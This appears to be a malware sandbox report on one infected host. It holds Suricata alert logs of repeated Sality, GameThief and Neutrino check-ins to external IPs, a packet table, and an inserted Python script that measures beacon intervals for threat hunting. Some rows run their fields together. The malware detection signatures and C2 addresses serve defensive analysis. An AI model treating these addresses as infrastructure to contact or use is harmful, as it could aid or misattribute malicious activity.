                                                                                                                                                                                                                                                                                          2024-10-18T12:43:05.816068+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949814190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:05.816068+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949814190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:07.131282+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949835185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:07.131282+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949835185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:11.408873+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949842190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:11.408873+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949842190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:11.408873+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949842190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:12.995616+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949861185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:12.995616+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949861185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:17.555326+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949870190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:17.555326+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949870190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:17.555326+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949870190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:18.923435+02002816165ETPRO MALWARE Win32/Neutrino checkin 41192.168.2.949867194.5.152.21580TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:19.906299+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949889185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:19.906299+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949889185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:23.986856+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949899190.120.227.918080TCP
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-18T12:43:23.986856+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 49899 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:23.986856+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49899 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:25.649318+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49918 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:25.649318+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49918 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:31.472599+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49927 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:31.472599+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 49927 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:31.472599+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49927 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:33.227599+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49949 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:33.227599+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49949 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:37.472929+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49955 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:37.472929+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 49955 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:37.472929+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49955 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:39.087157+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49977 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:39.087157+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49977 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:43.404850+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49983 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:43.404850+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 49983 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:43.404850+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49983 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:45.144872+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50001 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:45.144872+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50001 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:49.504205+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50007 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:49.504205+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50007 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:49.504205+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50007 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:51.117597+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50027 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:51.117597+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50027 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:55.528705+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50028 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:55.528705+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50028 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:55.528705+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50028 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:43:57.133083+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50029 | 185.53.178.50 | 80 | TCP
2024-10-18T12:43:57.133083+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50029 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:01.393948+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50030 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:01.393948+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50030 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:01.393948+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50030 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:03.034471+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50032 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:03.034471+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50032 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:05.202534+0200 | 2816165 | ETPRO MALWARE Win32/Neutrino checkin 4 | 1 | 192.168.2.9 | 50031 | 194.5.152.215 | 80 | TCP
2024-10-18T12:44:07.519217+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50033 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:07.519217+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50033 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:07.519217+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50033 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:09.073539+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50034 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:09.073539+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50034 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:13.364041+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50035 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:13.364041+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50035 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:13.364041+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50035 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:14.966939+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50036 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:14.966939+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50036 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:19.380085+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50037 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:19.380085+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50037 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:19.380085+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50037 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:20.972483+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50038 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:20.972483+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50038 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:25.769055+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50039 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:25.769055+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50039 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:25.769055+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50039 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:27.259821+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50040 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:27.259821+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50040 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:32.108634+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50041 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:32.108634+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50041 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:32.108634+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50041 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:34.003474+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50042 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:34.003474+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50042 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:38.544056+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50043 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:38.544056+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50043 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:38.544056+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50043 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:40.244422+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50044 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:40.244422+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50044 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:44.568350+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50045 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:44.568350+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50045 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:44.568350+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50045 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:47.270315+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50046 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:47.270315+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50046 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:51.551466+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50048 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:51.551466+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50048 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:51.551466+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50048 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:53.017759+0200 | 2816165 | ETPRO MALWARE Win32/Neutrino checkin 4 | 1 | 192.168.2.9 | 50047 | 194.5.152.215 | 80 | TCP
2024-10-18T12:44:53.223461+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50049 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:53.223461+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50049 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:57.651692+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50050 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:57.651692+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50050 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:57.651692+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50050 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:44:59.153333+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50051 | 185.53.178.50 | 80 | TCP
2024-10-18T12:44:59.153333+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50051 | 185.53.178.50 | 80 | TCP
2024-10-18T12:45:03.284445+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50052 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:03.284445+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50052 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:03.284445+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50052 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:04.962592+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50053 | 185.53.178.50 | 80 | TCP
2024-10-18T12:45:04.962592+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50053 | 185.53.178.50 | 80 | TCP
2024-10-18T12:45:09.512490+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50054 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:09.512490+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 50054 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:09.512490+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 50054 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:45:11.224026+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 50055 | 185.53.178.50 | 80 | TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:11.224026+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950055185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:15.957815+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950056190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:15.957815+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950056190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:15.957815+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950056190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:17.699821+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950057185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:17.699821+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950057185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:21.957273+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950058190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:21.957273+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950058190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:21.957273+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950058190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:23.641333+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950059185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:23.641333+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950059185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:27.761668+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950060190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:27.761668+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950060190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:27.761668+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950060190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:29.317116+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950061185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:29.317116+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950061185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:33.753048+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950062190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:33.753048+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.950062190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:33.753048+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950062190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:36.073156+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950064185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:36.073156+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.950064185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:45:38.986659+02002816165ETPRO MALWARE Win32/Neutrino checkin 41192.168.2.950063194.5.152.21580TCP
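The Sality check-in alerts above alternate between two destinations at a fairly steady spacing, which is the kind of cadence an analyst would want to measure before writing a beaconing hunt. The script below is an added example and is not part of the Joe Sandbox report or its tooling: it re-types a subset of the alert rows as a constructed, pipe-separated sample (the separator is an assumption of this example, as is the 25% jitter threshold used to call a cadence periodic) and reports, per destination, how many hits SID 2018340 produced, the mean gap between them, and the jitter of that gap.

```python
"""Check-in cadence per C2 destination, computed from Suricata alert rows.

Added example, not part of the Joe Sandbox report. ALERTS is a constructed
sample: alert rows from the report re-typed with a '|' separator (the
separator is an assumption of this example, not the report's own format).
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

ALERTS = """\
2024-10-18T12:44:59.153333+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50051|185.53.178.50|80|TCP
2024-10-18T12:45:03.284445+0200|2012736|ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin|1|192.168.2.9|50052|190.120.227.91|8080|TCP
2024-10-18T12:45:03.284445+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50052|190.120.227.91|8080|TCP
2024-10-18T12:45:04.962592+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50053|185.53.178.50|80|TCP
2024-10-18T12:45:09.512490+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50054|190.120.227.91|8080|TCP
2024-10-18T12:45:11.224026+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50055|185.53.178.50|80|TCP
2024-10-18T12:45:15.957815+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50056|190.120.227.91|8080|TCP
2024-10-18T12:45:17.699821+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50057|185.53.178.50|80|TCP
2024-10-18T12:45:21.957273+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50058|190.120.227.91|8080|TCP
2024-10-18T12:45:23.641333+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50059|185.53.178.50|80|TCP
2024-10-18T12:45:27.761668+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50060|190.120.227.91|8080|TCP
2024-10-18T12:45:29.317116+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50061|185.53.178.50|80|TCP
2024-10-18T12:45:33.753048+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50062|190.120.227.91|8080|TCP
2024-10-18T12:45:36.073156+0200|2018340|ET MALWARE Win32.Sality-GR Checkin|1|192.168.2.9|50064|185.53.178.50|80|TCP
2024-10-18T12:45:38.986659+0200|2816165|ETPRO MALWARE Win32/Neutrino checkin 4|1|192.168.2.9|50063|194.5.152.215|80|TCP
"""

# Column order of the Suricata alert table in the report.
COLUMNS = ("timestamp", "sid", "signature", "severity",
           "src_ip", "src_port", "dst_ip", "dst_port", "proto")


def parse_alerts(text):
    """Turn pipe-separated alert rows into dicts with typed timestamp/ints."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(zip(COLUMNS, line.split("|")))
        # "+0200" is parsed by %z; %f takes the six-digit microseconds.
        fields["timestamp"] = datetime.strptime(
            fields["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
        for key in ("sid", "severity", "src_port", "dst_port"):
            fields[key] = int(fields[key])
        rows.append(fields)
    return rows


def checkin_intervals(alerts, sid):
    """Seconds between consecutive hits of one SID, keyed by dst ip:port."""
    by_dest = defaultdict(list)
    for a in sorted(alerts, key=lambda a: a["timestamp"]):
        if a["sid"] == sid:
            by_dest[f'{a["dst_ip"]}:{a["dst_port"]}'].append(a["timestamp"])
    return {dest: [(later - earlier).total_seconds()
                   for earlier, later in zip(ts, ts[1:])]
            for dest, ts in by_dest.items()}


def summarize(alerts, sid, max_jitter=0.25):
    """Per destination: hit count, mean gap, jitter (pstdev/mean), periodic flag.

    max_jitter is an assumed threshold for this example; tune it to your data.
    Fewer than three hits give no usable jitter, so they are never flagged.
    """
    out = {}
    for dest, gaps in checkin_intervals(alerts, sid).items():
        if len(gaps) < 2:
            out[dest] = {"count": len(gaps) + 1, "mean": None,
                         "jitter": None, "periodic": False}
            continue
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg
        out[dest] = {"count": len(gaps) + 1, "mean": round(avg, 3),
                     "jitter": round(jitter, 3), "periodic": jitter <= max_jitter}
    return out


if __name__ == "__main__":
    parsed = parse_alerts(ALERTS)
    for dest, info in summarize(parsed, 2018340).items():
        print(dest, info)
```

On the sample, both Sality destinations come out at a little over six seconds per check-in with jitter well under 10%, while the single Neutrino and OnLineGames hits are correctly left unflagged. Swapping SID and destination for your own sensor's alerts turns the same logic into a first-pass beaconing hunt.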
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 18, 2024 12:41:33.797486067 CEST | 49707 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:33.812968016 CEST | 80 | 49707 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:33.815403938 CEST | 49707 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:33.815658092 CEST | 49707 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:33.831522942 CEST | 80 | 49707 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:34.964721918 CEST | 80 | 49707 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:34.964740992 CEST | 80 | 49707 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:34.964755058 CEST | 80 | 49707 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:34.964934111 CEST | 80 | 49707 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:34.975220919 CEST | 49707 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:35.891947031 CEST | 49709 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:35.926100016 CEST | 8080 | 49709 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:41:35.926373959 CEST | 49709 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:35.927814960 CEST | 49709 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:35.934643984 CEST | 8080 | 49709 | 190.120.227.91 | 192.168.2.9
Oct 18, 2024 12:41:39.935483932 CEST | 49709 | 8080 | 192.168.2.9 | 190.120.227.91
Oct 18, 2024 12:41:40.208328009 CEST | 49707 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:40.208508968 CEST | 49712 | 80 | 192.168.2.9 | 185.53.178.50
Oct 18, 2024 12:41:40.215116978 CEST | 80 | 49712 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:40.215146065 CEST | 80 | 49707 | 185.53.178.50 | 192.168.2.9
Oct 18, 2024 12:41:40.215977907 CEST | 49712 | 80 | 192.168.2.9 | 185.53.178.50
